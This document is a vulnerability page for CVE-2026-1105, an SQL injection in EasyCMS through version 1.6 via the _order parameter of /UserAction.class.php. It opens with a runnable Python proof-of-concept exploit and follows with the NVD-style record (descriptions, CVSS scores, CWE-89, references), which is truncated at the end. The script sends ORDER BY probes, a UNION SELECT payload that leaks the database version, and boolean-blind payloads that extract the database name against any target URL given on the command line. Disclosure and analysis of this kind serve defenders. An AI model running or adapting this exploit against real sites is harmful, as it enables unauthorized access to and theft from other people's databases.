CVE-2026-1105

# CVE-2026-1105 SQL Injection PoC for EasyCMS # Target: EasyCMS <= 1.6 # File: /UserAction.class.php # Parameter: _order import requests import sys def test_sqli(url, payload): """Test SQL injection vulnerability""" target_url = f"{url}/UserAction.class.php" params = { '_order': payload } try: response = requests.get(target_url, params=params, timeout=10) return response.text except requests.exceptions.RequestException as e: print(f"Request failed: {e}") return None def extract_db_version(url): """Extract database version using UNION-based injection""" payload = "1 ORDER BY 1,2,3,4,5,6,7,8-- -" print(f"[*] Testing basic ORDER BY injection...") test_sqli(url, payload) # UNION injection to get database version union_payload = "-1 UNION SELECT NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL-- -" print(f"[*] Extracting database version...") result = test_sqli(url, union_payload) if result: print(f"[+] Database info extracted: {result}") return result def blind_sqli(url): """Boolean-based blind SQL injection""" true_payload = "1 AND 1=1" false_payload = "1 AND 1=2" true_resp = test_sqli(url, true_payload) false_resp = test_sqli(url, false_payload) if true_resp != false_resp: print("[+] Blind SQL injection confirmed!") # Extract data bit by bit for i in range(1, 50): payload = f"1 AND ASCII(SUBSTRING((SELECT database()),{i},1))>0" if test_sqli(url, payload) == true_resp: print(f"[*] Database name character {i} exists") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2026-1105.py <target_url>") print("Example: python cve-2026-1105.py http://target.com") sys.exit(1) target = sys.argv[1] print(f"[*] Target: {target}") print(f"[*] CVE-2026-1105 SQL Injection Test") extract_db_version(target) blind_sqli(target)

{"cve": {"id": "CVE-2026-1105", "sourceIdentifier": "[email protected]", "published": "2026-01-18T00:15:49.197", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in EasyCMS up to 1.6. This vulnerability affects unknown code of the file /UserAction.class.php. Such manipulation of the argument _order leads to sql injection. The attack can be executed remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Una vulnerabilidad fue identificada en EasyCMS hasta 1.6. Esta vulnerabilidad afecta código desconocido del archivo /UserAction.class.PHP. Dicha manipulación del argumento _order conduce a inyección SQL. El ataque puede ser ejecutado de forma remota. El exploit está disponible públicamente y podría ser utilizado. El proveedor fue contactado con antelación sobre esta divulgación pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:easycms:easycms:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.6", "matchCriteriaId": "018DA419-A976-4312-82A2-4176CC22E454"}]}]}], "references": [{"url": "https://github.com/ueh1013/VULN/issues/15", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.341697", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.341697", "source": "[email protected]", "tags": ["Third Party Advisory", " ... (truncated)